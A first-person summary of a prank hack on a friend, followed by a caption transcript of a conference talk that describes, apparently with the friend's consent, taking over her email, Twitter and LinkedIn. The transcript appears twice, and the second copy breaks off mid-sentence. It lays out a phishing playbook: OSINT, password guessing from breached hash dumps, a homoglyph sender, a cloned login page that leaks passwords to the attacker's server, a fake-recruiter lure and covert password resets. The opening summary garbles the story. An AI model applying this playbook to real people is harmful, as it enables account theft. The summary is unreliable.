**A Tale of Social Engineering: How I Manipulated My Friend's Online Presence**

I must say that I'm quite proud of myself for pulling off this elaborate scheme. It started with a simple idea - to change my friend's LinkedIn profile bio to be the entire Wikipedia page on Luigi, making it seem like she had developed an interest in the iconic Mario brother. And to my surprise, LinkedIn flagged her profile as "advanced," giving me a sense of accomplishment.

As I continued to manipulate her online presence, I decided to take it up a notch by changing her Twitter handle to a cleverly crafted phrase that would make it seem like she was trying to get noticed. And, boy, did she ever notice! She replied to the tweet, and I responded as her, pretending to be in on the joke. But what's interesting is that she didn't suspect a thing until we were both logged in at the same time, and then she realized she had been hacked.

But don't worry, I assured her that nothing bad was happening and promised to stop soon. And, for her sake, I did. However, this experience taught me a valuable lesson about online safety and the importance of two-factor authentication. So, I helped her set up 2FA on her email account, making it significantly harder for me (or anyone else) to gain access.

The aftermath was quite amusing, as she discovered that someone had taken over her Twitter account and was tweeting away with a Luigi-themed flair. She was thrilled to have this new "Waluigi" persona, and I couldn't help but chuckle at the absurdity of it all. But what's even more fascinating is how she asked me about online safety and security, wondering why she had been hacked in the first place.

In my response, I tried to be empathetic while also providing some practical advice on how to stay safe online. I explained that investing time and effort into securing one's digital life was essential but acknowledged that it's not always easy or fun. I offered suggestions like using two-factor authentication and keeping backup codes in a safe place, hoping that my friend would take heed of these warnings.

As we concluded our conversation, I couldn't help but wonder where I had gotten those LinkedIn and Tumblr password hashes from in the first place. Was it a leftover from a previous experiment? A careless mistake? Or simply a collection of passwords gathered over time? Whatever the origin, I was grateful to have them on hand for this little exercise.

In conclusion, our conversation about online safety and security was a delightful detour into the world of social engineering and digital manipulation. While it may not be the most responsible or recommended behavior, I hope that this story serves as a cautionary tale about the importance of being mindful of one's online presence and taking steps to protect oneself from potential threats. And who knows? Maybe my friend will take these lessons to heart and become a digital security expert in her own right.

**A Side Note: The Importance of Two-Factor Authentication**

As I mentioned earlier, two-factor authentication (2FA) is an excellent way to add an extra layer of security to one's online accounts. It requires both a password and a verification code sent to the user's phone or email address, making it significantly harder for hackers to gain access.

Using 2FA on your accounts is not just a good idea; it's a necessity in today's digital landscape. Many websites and services now require 2FA as a standard security measure, so it's essential to stay ahead of the curve. And, as I warned my friend, there are many ways to bypass these security measures without using 2FA.

So, what can you do to stay safe online? Here are some practical tips:

* Use strong and unique passwords for all your accounts.

* Enable two-factor authentication whenever possible.

* Keep backup codes in a safe place (like a password manager).

* Be cautious when clicking on links or responding to unsolicited messages.

By following these simple guidelines, you can significantly reduce the risk of becoming a victim of online scams and manipulation. And remember, it's always better to be safe than sorry – or, in this case, than Waluigi!

"WEBVTTKind: captionsLanguage: enum alex is going to introduce himself because he can do a much better job at it than i can so alex hi everybody hi hi hello um i will see you all in 150 slides so um can you see everything okay good my name is alex and some people let me do a talk here at pycon and so here i am um i used to do security instead of response atlassian but lately i've been doing uh red teaming which is like sponsored crimes and it's been really fun and today i'm going to talk to you about some things um also i also i've also agreed to like help organize this conference called purplecon and i've agreed to help organize it because i'm young and invincible uh recently no not recently a few years ago now um some uh i wrote about some like crimes that i did and some people some journalists wrote about that blog post and they said oh according to a blog post by a hacker who goes by the name alex and they put it in quotes and so alexis is my alex is my real name also and so so this is my this is my hacker name now um you can call me that i can't stop you i'm about to talk about i'm talking i'm about to talk about hacking my friend like a real friend like an actual friend of mine who's like a real person and not made up and so like in case any of you are having the genius idea that you should hack your friends um don't do that you it's not good it's not a good thing to do the only reason that's okay that i did it is because i explicitly asked them like d is it okay if i try and hack you do you understand what it means like are you sure you want to take the risks and so on and so on and this person said yes anyways this is my friend diana um dana's not her real name that's not a real picture this whole thing is like a lie um but it's what it's not a lie that she really did say it's okay for me to try and hack her and explain what all that is and so some things about her that you're gonna need to know is that she's a comedian that's her job and she's uh sweet and young and her like tech literacy is normal she like all of you people here at pycon probably know more about taking computers than she does she knows the normal amount for someone her age and so i like for some reason she said yes by the way she was like the first person i asked and i was like hey is it okay if i try and hack all your stuff and she was like yeah that was much easier than i thought it would be and so i made some rules about like okay well there's not just going to be no rules maybe so what what what constraints are we going to have and so i have 12 months to do it i can do any term in that 12 months i'm not allowed to delete anything so i'll have to add stuff and look at stuff but i was like what if i deleted your emails and she was like oh that that would be bad okay you can't do that um and uh also i'm not allowed to disrupt her daily life so this means like if i were to lock her out of her email account by like changing the password then that would be bad because she needs her email account to like do things or if i was to like i don't know spam post stuff on her facebook wall then like that would be bad because she'd be like distracted by that i need to like not like interrupt her or inconvenience her because she's my real life real friend um also i decided that i'm just going to do this whole thing without getting caught because that's what not getting distracted sounds like anyway and also i'm not allowed to exploit the fact that i know her in real life so i know her like email address and phone number and where she lives and all this stuff i'm gonna not use that information i'm gonna do it as if i was a real hacker okay oh so that's right this talks for operation luigi's or the picture of luigi at the beginning you might be wondering why is this talk called operation luigi in the interest of timeless you can get straight to it the first thing we have to do is find out what her email address is even though we already know we have to find it and so i was like okay well i'm using this advanced hacking software um and i'm going to just uh put her name into it and the word linkedin and linkedin just tells me here's what her email address is because linkedin encourages you hey put your email address on linkedin so people can find you people like me um not really mostly recruiters but also people like me i notice it's a hotmail email address and i'm like oh maybe this is wrong maybe this is old because like no one's using hotmail still are they and so um but so then i went to her twitter i wanted to know whether this was her real email or her main email address i went to her twitter and if you try and reset your password on twitter it will say sure you can reset your password we're going to email a link to and then it will give you most of the email address it'll give you a few letters and the domain and i was like cool this means this is this means the hotmail one is a current email address weird people whether she's still using hotmail just but okay uh also this screenshot is old this doesn't happen anymore twitter doesn't let you do this anymore if you go and reset your password on twitter right now it'll be like sure you can reset your password type in the email address that you use to log into this twitter account tell us the email address and then we'll give you a link presumably to prevent this so good stuff twitter okay so now i have to get a phone number i think by the way i'm not this is my first time like hacking someone anything and so i'm like i don't really know what i'm doing but i've seen other people do it at conferences so i'm like i think i just need to collect everything that can be collected about this person first then somehow it'll somehow hacking will happen and so i'm like okay um here's okay i've got an email address and i'll put the word phone into my advanced hacking software i've actually obscured the name of the hacking software so you can't tell which one it is because it's so powerful um and so i do this and there's like a page and just says like hey do you want to sign up to this club because she's like the head of some sort of club and says contact anna at this email address this phone number because like she just put it on there online because she wanted to be found and so like this is not i'm not saying she's dumb or bad for doing this this is totally normal right you have to have some sort of privacy trade-off if you're going to like advertise yourself which is what you need to do if you're organizing a club or anything so like what can you do about that right if you want to organize a club you got to put some sort of contact information on the internet it works for me and so now i'm like okay what do i do i have the i have the email address and phone number what do i do now uh okay um um maybe i should i went to a lot of conferences and they say you have to email someone a word document with macros in it and then they click the macros and then you have control of the computer and i was like okay well i don't really know how to do that um also does she even have a laptop maybe she just has a phone also like if i got control of the computer then what would i do that would what would i i would probably just try and get her browser cookies and log into cloud stuff anyway so maybe i don't actually want control of the computer maybe i want her like say like email and passwords and stuff and so okay i'm not gonna do this this is too hard maybe i can just maybe i'll try and hack into email first and then i can decide what to do because her email is kind of like you know the the the keys to the kingdom sort of the top of everything if you can hack if you can get into someone's email then you can use the email to reset their twitter and reset their other stuff and get into all their other accounts so i'm going to try and go for that this is what this is what i justified this to myself it was late at night whatever um okay so now i have to get her email password note that i can't get into her email any other way i have to actually know her email password and type it in and log in at the same time as her because if i got into her email any other way by like pretending to be here and resetting it she will get kicked out of it so she has to also still be an email and also not know that i'm also in an email so the only way i can do this is by just getting the password which is what i'm trying to do um there's this great website for getting passwords um called have i been owned owned a lot of controversy on how to pronounce that and uh you left you uh put in an email address and it will tell you which of the like public data breaches they're called that email address appears in so you can put in your email and it will tell you yeah like linkedin got hacked in 2012 and your email was in there so some hacker has your linkedin password and it will tell you that for all the different sites that have been hacked that the all the different ones that this website knows about um clever nowhere does it say that you need to put in your email address so very cleverly i put in her email address and i find that she's at the time of writing um she was only in uh she was in a few the only interesting ones where patreon and tumblr patreon didn't have passwords tumblr was the only one that had passwords in the like data breach thing and so i was like okay cool i know my friend's like password is on the internet now i know it's on this it's in this tumblr thing um this is great so now uh the tumblr password dump is something that i just happen to have lying around and so it looks like this it's a big text file and it's just got the email address and then a column and the password hash and hackers are not very good at documenting their stuff and so they don't really say what kind of password hashes they are just a text file i looked around the internet and people seem to think that they're shy one hashes with a static salt and i'm like cool what does that mean and so let me explain what a static salt is um so imagine you're like i don't know a website let's call them tumblr and you're storing like emails and passwords uh this is one where you could do it you could store the email address of the person and you could also just store their password because then when they log in you know whether they typed in the right password because you have their password but then you go to a security conference and they tell you you're not allowed to do that so okay actually you need to hash the passwords so this way you don't store the password you store this like scrambled up version of it and then you can then you don't have to ch and you don't have to um keep a copy of the user's password but you can still check whether they type the right password in so okay now it's drawing password hashes and you're like am i doing it now and people at security conferences are like no this is not good enough you need to do the salting thing now and so now you need to before you hash before you hash the password you need to add a random string to the end of it just in case somebody has a big list of the hash of every possible like eight character string then they could possibly use that to like reverse what your hash was back into the password so you have to add this salt thing to the end and so you go okay okay and so now you're adding this salt and you add all the end of the password it's like this this is called a static sort and static means it's the same for all the passwords and so now you're adding the same thing to the end of every single password and the point of this is to prevent somebody with a big list of the hash of every single string from using that big list to reverse your password hashes but do you see the problem here the problem is that these two parts these two users have the same password and because we're adding the same thing to the end of the password the same the same static so the thing that's getting hashed is the same for both of these people in fact they're going to have the same password if and only if they have the same password hash and so even when we hash everything you can see these two these two users have the same password hash you don't know what it is you don't know what the password is but you know these two people have the same password because of the static salt thing uh so why am i telling you all about this static sold thing it's because i don't know what the soft is for the tumbler password dump even though it's the salt it's not meant to be a secret thing it's meant to be like public it's meant to be as public as like the usernames but i don't know what it is because it's not included in the text file because hackers are not good at documenting their stuff um so i'm like okay i really want to i really want to get my friends password out of this but i don't know how um so the first thing i did when i had the list was i searched for my friend's email address and i'm like okay if i grab for her email address i'll get all the lines that have her email address in it which is just the one with their password hash in it i'm like cool but i don't know what this don't know what this password hash goes to i don't know what password this password hash is of so here's the sneaky thing i do uh i search for her password hash in the file not her password just her password hash like an absolute madman because uh well what do you think will happen what do you think will happen when i type in her like when i grip for her password it should just be one like it should just be her line right should just have my friend dana's thing there's like 20 people who have the the same have the same password hash right and these people it's like a little pathway book club right they can all get along and these these fun these fun little book enthusiasts all have the same password on tumblr and so this tells me a few things um probably it's not a very good password since all these people have thought of the same one but again i'm very smug but i don't know what it is so i need to find out what it is and so here's what i do i get just the email addresses of those people in the password book club i throw away the password hashes don't know what i don't know what to do with the hash just get those email addresses these are all the people who have the same password as diana and then conveniently did you know that linkedin was also hacked in 2012 and uh dan dana was not in this list because she didn't have linkedin in 2012 but lots of people were and thanks to the hard work and gpu cycles of people in the password cracking community almost all those linkedin passwords are in plain text now they're not just hashes their emails and like you know just passwords you can just look at with your eyes and i was like wow i also just happen to have that lying around and so then i did this thing where i looked up the same people who in the password book club in the tumblr list in the linkedin list and i found most of them not all about 80 of them had the same password as each other on linkedin as well so isn't that really sweet that book club transcends like services um and i thought it was sweet and uh i found that most of them had the password query one and so this is a bit of a there's a bit of like a bit of a jump here but i'm guessing that my friend dana has the same password as all these people on tumblr okay i'm not guessing that's definitely true and then i'm guessing that they'll have the same password on linkedin and then i'm guessing that that password is this most frequent one this quote query one thing i'm guessing that that's diana's password and i'm like okay i've done it let's go uh cordy wants down the password i did it i'm hacking let's go it's time to use this thing i got hotmail type in and it's not the right password like that's not a hotmail password it was that was it wasn't it and i was like well damn why did i do all this work why did i go to all these great lengths okay whatever um so then i go to facebook and so i don't just try it on her hotmail i tried on everything i go to facebook and uh it says oh no that's not your facebook password but it's an old password it was your password about five months ago i'm like oh thanks facebook for taunting me i guess i'm too late um but i mean like okay so this did used to be her password she just happens to have changed it recently and i've somehow stumbled upon a person it has more than one password in their life um so i'm like okay fine i guess it's the hard way um which is what i didn't want to have to do so by the way uh this this is what i had planned this is what i thought this like hacking would be like i was going to be like ah it's so easy to hack someone you just look them up and all these lists you have lying around and it's as easy as that and so the rest of this talk will be about how it's not as easy as that always and so i'm like okay i guess i'm going to try and do this fishing thing i'm going to try and trick her into sending me the password because everyone else is doing it it's more work it's way more it's more work because you have to make something custom but like oh well i don't know is this how you do fishing i don't know it's my first time maybe i should do something like this i don't know you don't know that you don't know that it won't work um so now i'm not going to do that i'm going to do this here's the plan i come up with i'm going to send her a fake email from microsoft because she has hotmail it has to be microsoft and that email is going to take her to a login screen for hotmail but it's a fake login screen that actually sends me a password and then she'll go to the real hotmail login screen and just kind of keep going as if nothing happened this is my plan i don't know don't whatever and so um but to do this i'm going to need to make a hotmail account to send the email from so i go to i go to make a hotmail account which will let me open a world of benefits and i try to make one that looks like microsoft i try to make a microsoft account team and says no you can't do that presumably because the word microsoft is in the email address and they know i'm not microsoft and so i try to make my first name microsoft and my last name account team and they're like no you can't do that and presumably to stop exactly what i'm trying to do and fair enough however these are my round friends and they're these look like two o's don't they looks like i put two o's in this slide like an absolute fool but actually one of them is an o and one of them is a greek letter omicron which looks a lot like an o to you and me doesn't it but to a computer they're completely different like unicode code points and so like if you just spell microsoft like this with these omicrons then like that doesn't say microsoft but like to you and me it looks like it does and so like does this really work i'm sure you're wondering like surely like surely the billions of dollars at microsoft and the most advanced mines aren't going to be full but no does work yeah it does and so i make this i make this microsoft account team thing and i send it this email which says like i copied this from like a real microsoft email that i got i copied all the like styling and most of the text and it says oh you better log into your account in the next 48 hours or we're gonna lock it um oh please do it or it's gonna be real bad this oh boy there's like russians ipad dresses you wouldn't want that i don't know um and so it says like come and log in please um but again this is just an email like that link that that don't lock his account thing at the bottom there has to be a link to something and so i need to make that i need to make a website for that bottom button to link to so okay let's go this is the real what my login screen it was at the time and so i'm gonna uh i need to make a copy of this and so there's another way to make a copy of things there's this hacking tools technique i learned about where stuff have you seen this before step one if you right click on something step two you hit this button and when you hit that inspect element button that's the good stuff i think there are easier ways to copy websites but i always do it this way anyway so here's my copy of the website it looks the same because it is the same um but this time it's on my computer it's on localhost and so now i need to put on the internet somehow um and so i'm like how do i put this i can't link her to localhost how do i put this online and i found this like static hosting company website thing they're not paying me to say this but they have like they let you like host static files on the internet and this is really good because you get a custom subdomain so you can be anything dot aerobatic.io and they give you https for free and it's like two commands or something to do it and no one knows about it so all the good subdomains aren't taken um so like i'm sure it's a good static hosting site but it happens to also be a really good phishing hosting site so um thank you to these people you can use the promo code diana to be immediately reported to the authorities uh this so this is the one i made this is the um the the domain i chose the real hotmail login screen is like the real hotmail login domain is login.live.com and so i could have like made my own domain name and like made it look even more similar but i just don't think diana's going to look at this at the the url very much because she's not like a paranoid security person like us so um but then again for some reason login when you go to like a login screen the url doesn't look like that it looks like this it has a bunch of like stuff at the end and so i just added a bunch of stuff at the end like it it doesn't do anything i actually stole it from the google login screen um but whatever okay it's my first time and so here it is this is my fake login screen on the internet now i know it's the same picture but this time on the internet trust me um and so i also add these bonus features to it um the first one is that after she clicks the the login button the submit button it's going to add an image to the page and the image goes to a website i control forward slash diana and then question mark and then plus whatever password is so the reason i'm doing this is to try and steal whatever just trying to steal a password this is like a terrible awful way to do it that you probably shouldn't do but it's really easy so like i'm going to get a request to my website forward slash diana and then plus some password i don't know what this password is so it's going to be a 404 but then in my logs it's going to be a request for a 404 to diana and then the password so i'm just going to be looking at my logs for this diana thing and when it shows up i'll be like ah that's the password and then i make it so that after she clicks the button it waits one second and then goes to the real hotmail login screen the one second way to simulate australian internet speeds anyway here's the email i send it's like you know look out it's something real bad's gonna happen and you only got 48 hours because i'm creating time pressure and i'm doing all the good stuff i've seen random phishing emails do but i kind of just want this to work so come on click click the link and so i send it to her and search your anastasia 48 hours and then 24 hours later nothing happens i'm looking at my logs and she's not there so i'm like she hasn't clicked on it yet and so i'm like oh okay uh so i sent the email again saying like same thing but now you only have 48 hours and now you only have 24 hours you better click it and then 48 hours later she also doesn't click on it and i'm like oh okay all right like at this point i'm not actually hacking anyone i'm just emailing my friend i'm like okay that's a shame i guess it wasn't interesting enough email and fair enough the thing i learned from this is that people don't really care about emails from microsoft or about like emails from like like automated emails i care about emails from people which leads me to the next way i try and do this which is like okay she's gonna be like on the internet whatever and she's gonna get an email from a recruiter and the recruiter is gonna link her to another fake to the same fake login page and then you're going to go to a google doc and the login page is going to make a login to see a google doc is that such but this is microsoft this is hotmail hotmail doesn't have google docs is there such thing as microsoft google docs and so i look it up is this is that a thing is that a real thing and there is and it's called cloud sky something something something something something and like and so i'm like great and so i log into this and make oh no i think i make the make the document in something else and then copy and paste it into this um and so now i have a microsoft google doc and you might be wondering what document i made i made a resume like i think like fake but convincing looking resume and then i send her oh no before i do that i have to make the person who's going to send it to her i can't email her for me can't email her from a microsoft account team so i guess it's going to have to be from this fake person and so i go to the google login screen you can put whatever you want in these boxes it's very good and so i make this person called kathleen wheeler who's like a mix of a first name and last name from a real company that i found and then i sent her this which says this is me writing this sometimes i sound like i'm a recruiter i don't really know what could it sound like and i'm saying hey i work at this comedy company which you care about um which i looked up earlier on linkedin and uh somebody has listed you as a reference somebody has told us that you work together like somebody has said that they worked with you uh here's the resume tell us how you know them blah blah blah click here for the resume that link is obviously the one that goes to the fake login screen and then after all this text being like can you fill out this form and tell us these things and blah blah blah that's just to distract from the link and then it says also can uh can you let me a good time to call you is the phone number her phone number which i found earlier okay the reason i put a phone number there so she knows this is like for her it's not like an accident like this person clearly knows who she is and then i made a sweet email signature at the bottom with like a different font and everything i thought it was really good attention to detail or whatever and so i sent this to her and it totally works like she clicks it she taps in a password like the whole thing just works flawlessly and i was like wow that was really easy and then i looked a little bit closer and i'm like wait a minute this password that she sent me that's that's corey one that's i already have that one like that's already that's i already i was like what that's how could that did i do something wrong and then i was like no wait a minute here's what i've learned she does not know how to help me out that's what it is which which which in many ways is the ultimate defense against people so like don't don't don't shame her for this but also because my fake login screen will just say yes no matter what password you type in and actually thinks this is a password yeah and i'm like whoops i hope i can fix that after this is all over anyway so i up instead of giving up i update my login screen so now no matter what you type in it just says wrong password the first three times because my theory is that people who like memorize all their passwords uh they just try one and if it doesn't work let's try the other one and the other one they just unload all their passwords into the form and so um i also change it so if you try a qwerty one the counter doesn't go up so you can't just type 21 three times and so then i send her out then she replies and she's like no i haven't worked with this person which is true because i don't exist uh and then she's like yeah you can call me that's the right phone number and i'm not going to call her because i'm not capitalizing out and then i'm like then i have a reply being like oops that was the wrong resume oh for some reason you better click on this this makes no sense right like like if you think about this like if you stop and think about this oh there's another person who also worked with you around the same time but with different dates today and i sent you their resume instead of the other that doesn't make any sense right like this story doesn't work but it has the same like bait of like somebody says they know you and you have to click to find out who and so i'm like you know pl please just click on it anyway please i know um and she does and this time same thing happens she clicks on it and she like types in a thing she types the same thing three times which is this other password which looks a lot like cody one um oh also none of these are real but they're similar to what they actually were um this one's like shifted along by one on the keyboard i'm like hmm okay what's this password and so i go to hotmail and like using my using the advanced hacking software google chrome type the password into the hotmail login screen and press enter and it totally works i get into email and i'm like it's as easy as that everybody see it's simple okay so i did i got an email password but now what do i do like i try the same password on everything and it doesn't work i'm like great this person has three passwords in their lives and then she replies being like no i haven't worked with this person either why are you doing this what what's happening and i reply just being like don't worry about it don't stress about it you know i'll just handle it please don't email me anymore please just forget about this and she does she doesn't reply so i'm like great meanwhile i log into email and i click on i want to search for more passwords so i can log into more stuff and so i like click on the search bar thing and it shows me her last five searches and i'm like oh but the last five searches aren't anything interesting um but i want to search for like password and other things but if i do it then she'll see there's in her search history right so uh i write down the last five things she searched for and then search for my stuff and then search for those things in reverse so so it looks exactly the same because it only shows the last five microsoft knows what i've done but i i'm doing it anyway um and it totally works but i didn't find any passwords because i don't know i found a lot of passwords i already had but i didn't find any new passwords and i was like fine whatever so this is the end of the talk i guess that's it i mean our email never believe it when it says the end question mark no it's obviously not the end geez um the stock is called operation let's talk is called operation luigi and i'm like already in my friend's email you know it'd be a real shame to just kind of leave it at that you know be real shame to not like do anything with that so here's what operation luigi is here's what we need to do first thing is get into her twitter second thing is to not lock her out of her twitter because she needs to be in there too and also don't let her know that i'm in her stuff don't know they don't have to know that i'm in her twitter um so here's how i do it i go to twitter and i'll be like hey i forgot my password until it lets me reset it and like you know because i'm in her email now and so i can reset the password because it'll send me the email and i can click it and i can do that now and so i changed her twitter password to qwerty1 and so that's because this is the password that i think she thinks her password is and there's a little emails and blah blah blah wait for her to log in and because i need her to log in so i know that she's actually type 21 and she's back in her own account and i wait a while and then eventually she actually logs in and i'm like great it works she retweets she reshooted a picture of a dog and i was like yes okay so then i do the exact same thing with linkedin as i did with twitter and i try to change the linkedin password to kodi one as well but it doesn't let me presume because i got the qwerty one from the linkedin password jump so they know it's bad then there's a little box at the bottom which says require all devices to sign in with a new password which is like would you like to sign me out on like would you like to sign out all your other devices and i'm like absolutely not thank you linkedin for giving me this option it's unchecked by default so i can just change your password without even signing her out and so i just do that and then i log in and so okay now what let me explain so this picture of obama is here because i can't show you down as real pictures i have to show you uh because i can't show you how real profile pictures i'm going to show you what i did to her real profile pictures but with pictures of obama i don't know just go with it and so here's what her twitter picture was and i changed it to be like this i don't know if you can tell there's like it's like a low there's like a lightly transparent luigi there and so also she had a linkedin picture and i changed the linkedin picture to have like another luigi on it can you see it and so i just left it there for like i don't know weeks i don't know okay yeah good weeks i just left it there and no one said anything and i said okay i thought she might have noticed then but this is sort of like proof that i got somewhere and so you know nothing happened so i was like okay well was this over this was operational luigi because it's not over the remainder of this talk will be about operation waluigi and you know i came up with this like a long time ago back when this meme was like you know new anyway whatever waluigi let's go so i changed her link i changed her linkedin bio to be the entire wikipedia page for luigi and when i do this linkedin says her profile strength is advanced so thank you linkedin thank you linkedin for being there for me this entire talk anyway i changed her twitter to be this like i i want to make it super obvious so she i wanted to know that i'm there i want i want to be caught now like i'm trying to be caught i'm like hello notice me i'm very loud i tweet this from her account just go for it and she's online at the same time because it's like 7pm and she replies and she says omg to this thing and she says i've been hacked my dudes but then because i'm also logged in at the same time i reply as her saying oh no no it just seemed like the right thing to do at the time anyway then i tweet this then i create this and i keep doing things until she messages me and i treat longings for the days of this sweet lad and keep tweeting things and eventually she messages me and be like oh my gosh my twitter is this you and i'm like yes it's me don't worry nothing bad's happening i'll stop now it's all congratulations i guess you got me um and here's what happened after that um she loves her new waluigi life so much she goes and changes her facebook to be a waluigi themed even though i didn't even touch it um she listens to she's like gets really into luigi culture i'm not going to read this that like she like she like really got into it and she also asked me like wow how do i not get hacked like how do i what did i do wrong i'm like well you didn't do anything wrong but like this is kind of a question that people ask a lot right people ask security people like how do i stay safe what should i be doing online and these are just like regular people who ask this like not security people they're just like normal people they're not weird like us and they say oh how do i stay safe and sometimes the kind of answers they hear from security people are like oh you got to do all these things and live in a submarine and never go anywhere and you get to get all this advanced multi-factor ub keys or whatever and so like there are other things you can say you know so here's what i told her i was like well listen it's up to you right like there are things you can do to stay safe there are things you can do that they eat like there are things you can do to stay safe but they involve investing more time and effort it's up to you how much your investors up to you how much you care about this maybe you don't care and your finder is getting hacked that's okay that's a valid way to live your life um and so i help her set up two factor auth on her email because i'm about to do this blog post and publish a guide on how to hack her so i don't want it to be repeatable and so help her set up two factor authors so now she'll get a code on her phone which will be would have been way harder for me to get past because it's way harder to get past two factors you have to like i don't know fish the two-factor auth code or socially engineered the phone company too hard and so she was very happy that it wasn't that hard she was very happy that she could just do this and it wasn't like much extra effort for her because this is like the lowest effort highest security value thing i think that she could have done um and so she has a little app like this you know you know how to actually she has this little app and she's like yeah now i can just type in these codes um these backup codes are kind of a trap though and i kind of warned about only using the app because see that button that's like uh you know saved a text file or keep these codes somewhere safe no one clicks those buttons everyone's just like yeah whatever clothes like no one keeps these backup codes and so um that's why it's that's one of the reasons that's good type sms as a backup anyway in conclusion i just talked about luigi for like a long time so i hope you liked it and oh the last thing is you might be wondering like where did i get these before i was like oh i had these lying around probably wondering where did i get the like linkedin and tumblr like password hashes where did where do they actually come from thank you very much thank you hello thank you alex for uh that talk we have a lovely cup for you thank you um can melissa oh sorry alyssa come up to the stage awesome thanksum alex is going to introduce himself because he can do a much better job at it than i can so alex hi everybody hi hi hello um i will see you all in 150 slides so um can you see everything okay good my name is alex and some people let me do a talk here at pycon and so here i am um i used to do security instead of response atlassian but lately i've been doing uh red teaming which is like sponsored crimes and it's been really fun and today i'm going to talk to you about some things um also i also i've also agreed to like help organize this conference called purplecon and i've agreed to help organize it because i'm young and invincible uh recently no not recently a few years ago now um some uh i wrote about some like crimes that i did and some people some journalists wrote about that blog post and they said oh according to a blog post by a hacker who goes by the name alex and they put it in quotes and so alexis is my alex is my real name also and so so this is my this is my hacker name now um you can call me that i can't stop you i'm about to talk about i'm talking i'm about to talk about hacking my friend like a real friend like an actual friend of mine who's like a real person and not made up and so like in case any of you are having the genius idea that you should hack your friends um don't do that you it's not good it's not a good thing to do the only reason that's okay that i did it is because i explicitly asked them like d is it okay if i try and hack you do you understand what it means like are you sure you want to take the risks and so on and so on and this person said yes anyways this is my friend diana um dana's not her real name that's not a real picture this whole thing is like a lie um but it's what it's not a lie that she really did say it's okay for me to try and hack her and explain what all that is and so some things about her that you're gonna need to know is that she's a comedian that's her job and she's uh sweet and young and her like tech literacy is normal she like all of you people here at pycon probably know more about taking computers than she does she knows the normal amount for someone her age and so i like for some reason she said yes by the way she was like the first person i asked and i was like hey is it okay if i try and hack all your stuff and she was like yeah that was much easier than i thought it would be and so i made some rules about like okay well there's not just going to be no rules maybe so what what what constraints are we going to have and so i have 12 months to do it i can do any term in that 12 months i'm not allowed to delete anything so i'll have to add stuff and look at stuff but i was like what if i deleted your emails and she was like oh that that would be bad okay you can't do that um and uh also i'm not allowed to disrupt her daily life so this means like if i were to lock her out of her email account by like changing the password then that would be bad because she needs her email account to like do things or if i was to like i don't know spam post stuff on her facebook wall then like that would be bad because she'd be like distracted by that i need to like not like interrupt her or inconvenience her because she's my real life real friend um also i decided that i'm just going to do this whole thing without getting caught because that's what not getting distracted sounds like anyway and also i'm not allowed to exploit the fact that i know her in real life so i know her like email address and phone number and where she lives and all this stuff i'm gonna not use that information i'm gonna do it as if i was a real hacker okay oh so that's right this talks for operation luigi's or the picture of luigi at the beginning you might be wondering why is this talk called operation luigi in the interest of timeless you can get straight to it the first thing we have to do is find out what her email address is even though we already know we have to find it and so i was like okay well i'm using this advanced hacking software um and i'm going to just uh put her name into it and the word linkedin and linkedin just tells me here's what her email address is because linkedin encourages you hey put your email address on linkedin so people can find you people like me um not really mostly recruiters but also people like me i notice it's a hotmail email address and i'm like oh maybe this is wrong maybe this is old because like no one's using hotmail still are they and so um but so then i went to her twitter i wanted to know whether this was her real email or her main email address i went to her twitter and if you try and reset your password on twitter it will say sure you can reset your password we're going to email a link to and then it will give you most of the email address it'll give you a few letters and the domain and i was like cool this means this is this means the hotmail one is a current email address weird people whether she's still using hotmail just but okay uh also this screenshot is old this doesn't happen anymore twitter doesn't let you do this anymore if you go and reset your password on twitter right now it'll be like sure you can reset your password type in the email address that you use to log into this twitter account tell us the email address and then we'll give you a link presumably to prevent this so good stuff twitter okay so now i have to get a phone number i think by the way i'm not this is my first time like hacking someone anything and so i'm like i don't really know what i'm doing but i've seen other people do it at conferences so i'm like i think i just need to collect everything that can be collected about this person first then somehow it'll somehow hacking will happen and so i'm like okay um here's okay i've got an email address and i'll put the word phone into my advanced hacking software i've actually obscured the name of the hacking software so you can't tell which one it is because it's so powerful um and so i do this and there's like a page and just says like hey do you want to sign up to this club because she's like the head of some sort of club and says contact anna at this email address this phone number because like she just put it on there online because she wanted to be found and so like this is not i'm not saying she's dumb or bad for doing this this is totally normal right you have to have some sort of privacy trade-off if you're going to like advertise yourself which is what you need to do if you're organizing a club or anything so like what can you do about that right if you want to organize a club you got to put some sort of contact information on the internet it works for me and so now i'm like okay what do i do i have the i have the email address and phone number what do i do now uh okay um um maybe i should i went to a lot of conferences and they say you have to email someone a word document with macros in it and then they click the macros and then you have control of the computer and i was like okay well i don't really know how to do that um also does she even have a laptop maybe she just has a phone also like if i got control of the computer then what would i do that would what would i i would probably just try and get her browser cookies and log into cloud stuff anyway so maybe i don't actually want control of the computer maybe i want her like say like email and passwords and stuff and so okay i'm not gonna do this this is too hard maybe i can just maybe i'll try and hack into email first and then i can decide what to do because her email is kind of like you know the the the keys to the kingdom sort of the top of everything if you can hack if you can get into someone's email then you can use the email to reset their twitter and reset their other stuff and get into all their other accounts so i'm going to try and go for that this is what this is what i justified this to myself it was late at night whatever um okay so now i have to get her email password note that i can't get into her email any other way i have to actually know her email password and type it in and log in at the same time as her because if i got into her email any other way by like pretending to be here and resetting it she will get kicked out of it so she has to also still be an email and also not know that i'm also in an email so the only way i can do this is by just getting the password which is what i'm trying to do um there's this great website for getting passwords um called have i been owned owned a lot of controversy on how to pronounce that and uh you left you uh put in an email address and it will tell you which of the like public data breaches they're called that email address appears in so you can put in your email and it will tell you yeah like linkedin got hacked in 2012 and your email was in there so some hacker has your linkedin password and it will tell you that for all the different sites that have been hacked that the all the different ones that this website knows about um clever nowhere does it say that you need to put in your email address so very cleverly i put in her email address and i find that she's at the time of writing um she was only in uh she was in a few the only interesting ones where patreon and tumblr patreon didn't have passwords tumblr was the only one that had passwords in the like data breach thing and so i was like okay cool i know my friend's like password is on the internet now i know it's on this it's in this tumblr thing um this is great so now uh the tumblr password dump is something that i just happen to have lying around and so it looks like this it's a big text file and it's just got the email address and then a column and the password hash and hackers are not very good at documenting their stuff and so they don't really say what kind of password hashes they are just a text file i looked around the internet and people seem to think that they're shy one hashes with a static salt and i'm like cool what does that mean and so let me explain what a static salt is um so imagine you're like i don't know a website let's call them tumblr and you're storing like emails and passwords uh this is one where you could do it you could store the email address of the person and you could also just store their password because then when they log in you know whether they typed in the right password because you have their password but then you go to a security conference and they tell you you're not allowed to do that so okay actually you need to hash the passwords so this way you don't store the password you store this like scrambled up version of it and then you can then you don't have to ch and you don't have to um keep a copy of the user's password but you can still check whether they type the right password in so okay now it's drawing password hashes and you're like am i doing it now and people at security conferences are like no this is not good enough you need to do the salting thing now and so now you need to before you hash before you hash the password you need to 